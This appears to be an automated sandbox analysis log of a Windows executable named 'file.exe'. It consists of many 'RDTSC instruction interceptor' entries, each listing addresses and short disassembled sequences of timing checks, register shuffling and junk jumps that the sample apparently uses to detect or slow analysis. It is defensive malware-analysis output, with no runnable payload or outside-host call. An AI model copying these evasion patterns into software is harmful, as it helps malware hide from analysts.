              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 497422 second address: 49743C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F5AF5006756h 0x0000000e jmp 00007F5AF500675Ch 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4967B1 second address: 4967FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F5AF4D0D7E3h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jmp 00007F5AF4D0D7CDh 0x00000018 pop edi 0x00000019 js 00007F5AF4D0D7C8h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496AB7 second address: 496AC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496F2F second address: 496F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7CBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5AF4D0D7D7h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496F5A second address: 496F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 496F5E second address: 496F70 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5AF4D0D7C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F5AF4D0D7C6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B254 second address: 49B277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5AF5006765h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B3DA second address: 49B3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B3E2 second address: 49B422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF5006764h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F5AF5006764h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F5AF5006758h 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B422 second address: 49B427 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B6CE second address: 49B6E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF500675Ah 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B829 second address: 49B837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7CAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B837 second address: 49B83E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B83E second address: 49B863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5AF4D0D7D8h 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C355 second address: 44C359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44C359 second address: 44C35F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C720 second address: 49C729 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C729 second address: 49C738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5AF4D0D7C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49C738 second address: 49C73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49EF24 second address: 49EF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49EF28 second address: 49EF2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F07E second address: 49F083 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49F49E second address: 49F4A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A761D second address: 4A7625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5AB1 second address: 4A5AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5AF5006756h 0x0000000a popad 0x0000000b jp 00007F5AF5006770h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5AE0 second address: 4A5AF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5DB7 second address: 4A5DBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A5DBD second address: 4A5DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A66CD second address: 4A66F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006761h 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jno 00007F5AF5006756h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A66F1 second address: 4A6704 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5AF4D0D7C6h 0x00000008 js 00007F5AF4D0D7C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A69B8 second address: 4A69CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF5006763h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A69CF second address: 4A69DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F5AF4D0D7C6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A69DF second address: 4A69ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6F8B second address: 4A6F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F5AF4D0D7C6h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6F9B second address: 4A6FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6FA0 second address: 4A6FA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6FA6 second address: 4A6FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF500675Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A6FB5 second address: 4A6FC3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F5AF4D0D7C6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF963 second address: 4AF968 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AF968 second address: 4AF97A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F5AF4D0D7CAh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AFDD4 second address: 4AFDED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5AF500675Bh 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007F5AF5006756h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AFDED second address: 4AFDF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0068 second address: 4B006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B006C second address: 4B0072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0072 second address: 4B00A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5AF5006769h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5AF500675Dh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B8490 second address: 4B8496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B65C7 second address: 4B65DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF5006763h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B65DE second address: 4B65EE instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5AF4D0D7C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B65EE second address: 4B660A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF5006766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6BAA second address: 4B6BB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6BB0 second address: 4B6BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jng 00007F5AF5006758h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6BC3 second address: 4B6BC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6D3D second address: 4B6D42 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7023 second address: 4B7031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F5AF4D0D7C6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7031 second address: 4B7037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7037 second address: 4B7064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jmp 00007F5AF4D0D7D0h 0x0000000e jmp 00007F5AF4D0D7D0h 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7064 second address: 4B706A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B706A second address: 4B706F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7BAD second address: 4B7BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7BB3 second address: 4B7BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5AF4D0D7C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F5AF4D0D7CEh 0x00000013 push edx 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B7BD3 second address: 4B7BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B616C second address: 4B6177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5AF4D0D7C6h 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6177 second address: 4B617C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB7B0 second address: 4BB7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB7B6 second address: 4BB7BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BB7BB second address: 4BB7C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C035E second address: 4C0364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BFCE9 second address: 4BFD0B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5AF4D0D7DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BFE72 second address: 4BFE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF5006767h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BFE8E second address: 4BFEAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF4D0D7D6h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C004C second address: 4C0057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C0057 second address: 4C006F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5AF4D0D7CBh 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C699E second address: 4C69B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5AF5006761h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC1E4 second address: 4CC203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5AF4D0D7D6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4CC203 second address: 4CC209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2E2D second address: 4D2E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF4D0D7CCh 0x00000007 jmp 00007F5AF4D0D7D9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2E56 second address: 4D2E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5AF500675Fh 0x00000007 push ebx 0x00000008 jo 00007F5AF5006756h 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jmp 00007F5AF500675Dh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D2861 second address: 4D2867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D752B second address: 4D752F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFA2F second address: 4DFA4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F5AF4D0D7D3h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFA4A second address: 4DFA7A instructions: 0x00000000 rdtsc 0x00000002 je 00007F5AF500676Ch 0x00000008 jmp 00007F5AF5006764h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jc 00007F5AF5006772h 0x00000017 jc 00007F5AF500675Eh 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFA7A second address: 4DFA87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jno 00007F5AF4D0D7C6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF8DA second address: 4DF8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF8DE second address: 4DF8E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF8E2 second address: 4DF8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1069 second address: 4E1073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F5AF4D0D7C6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1073 second address: 4E1077 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E1077 second address: 4E108D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5AF4D0D7CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E108D second address: 4E10BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F5AF5006766h 0x00000011 pop eax 0x00000012 jno 00007F5AF500675Ch 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10BC second address: 4E10C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E10C2 second address: 4E10C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E97B1 second address: 4E97D6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5AF4D0D7CAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5AF4D0D7D5h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E97D6 second address: 4E97DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8276 second address: 4E8286 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jg 00007F5AF4D0D7C6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8286 second address: 4E82B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F5AF5006761h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5AF500675Dh 0x00000010 pushad 0x00000011 jmp 00007F5AF500675Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E82B8 second address: 4E82C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E86D1 second address: 4E86EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jp 00007F5AF5006766h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E89A3 second address: 4E89B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F5AF4D0D7C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
